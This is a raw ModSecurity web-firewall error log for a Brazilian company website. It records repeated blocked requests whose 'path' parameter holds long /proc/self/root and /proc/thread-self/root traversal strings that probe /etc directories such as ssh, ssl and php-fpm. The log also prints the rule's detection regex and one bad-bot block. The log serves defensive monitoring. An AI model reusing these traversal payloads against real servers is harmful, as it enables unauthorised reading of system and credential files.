[Thu Mar 19 04:38:09.742285 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:44090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun4eoXxyEfFpUF8f_eOAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:13.203874 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.243.128:51212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun5f-YZRR_7pZ7nDJa9AAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:17.712464 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:51228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun6da6ubjKNq_cu4YPDgAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:19.040784 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:51244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun6-oXxyEfFpUF8f_eQQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:23.050894 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:33674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun7sdf6f5d65gmYZRA0AAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:25.961843 2026] [:error] [pid 19093:tid 140411741927168] [client 74.7.243.128:33680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun8V_V7PWP6ixUYl6J1wAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:31.848689 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.243.128:33682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun91_V7PWP6ixUYl6J3QAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:38.043070 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:38486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abun-8df6f5d65gmYZRA1AAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:38:40.337858 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:57510] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoAAbLMZ6AikZjR9UrNgAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:39:10.571906 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:42522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoHuyqAr6etmhZHNoxiwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:11.919392 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:40790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoH-oXxyEfFpUF8f_eZwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:17.795004 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:40796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoJeyqAr6etmhZHNoxlAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:25.147058 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.241.31:38420] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoLfu8EFLIOrSqIptrXQAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:26.480036 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:38434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoLhkFeYa1D6dYQnC7wQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:28.974813 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.241.31:45376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoMF_V7PWP6ixUYl6KDQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:31.626456 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:45386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoM_-YZRR_7pZ7nDJbLAAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:39:32.239162 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.228.61:52840] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuoNAbLMZ6AikZjR9UrSwAAAAc"]
[Thu Mar 19 04:39:35.034393 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:45396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoN-yqAr6etmhZHNoxoQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:39:38.580316 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.241.31:45404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuoOhkFeYa1D6dYQnC70wAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:40:30.243367 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:57340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuobgbLMZ6AikZjR9UrjQAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:40:32.643734 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.241.31:45034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuocPu8EFLIOrSqIptrhQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:40:36.507207 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:38778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuodP-YZRR_7pZ7nDJbVgAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Thu Mar 19 04:40:37.378963 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.241.31:45036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuodf-YZRR_7pZ7nDJbWwAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
